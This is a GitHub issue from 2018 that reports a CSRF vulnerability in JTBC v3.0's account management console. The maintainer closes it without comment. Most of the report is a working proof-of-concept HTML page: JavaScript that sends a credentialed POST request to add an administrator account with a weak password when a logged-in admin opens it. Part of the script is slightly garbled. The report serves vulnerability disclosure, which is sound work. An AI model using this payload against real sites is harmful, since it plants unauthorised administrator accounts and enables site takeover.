Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is CSRF vulnerability that can add the administrator account #4

Eth4nHunt opened this Issue Sep 18, 2018 · 1 comment


None yet
2 participants
Copy link

Eth4nHunt commented Sep 18, 2018

/console/account/manage.php?type=action&action=add in JTBC v3.0(C) has CSRF,After the administrator logged in, open the csrf exp page,will be add a administrator.
csrf exp:

<title>test csrf</title> <script type="text/javascript"> var url = "http://x.x.x.x/phpjtbc/console/account/manage.php?type=action&action=add"; var postStr='username=testcsrf&password=123456&cpassword=123456&role=-1&'; var ajax = null; if (window.XMLHttpRequest) { ajax = new XMLHttpRequest(); } else if (window.ActiveXObject) { ajax = new ActiveXObject("Microsoft.XMLHTTP"); } else { ajax=null; }"POST", url, false); ajax.withCredentials = true; ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8"); ajax.send(postStr); </script>

This comment has been minimized.

Copy link

jetiben commented Sep 20, 2018


@jetiben jetiben closed this Sep 20, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.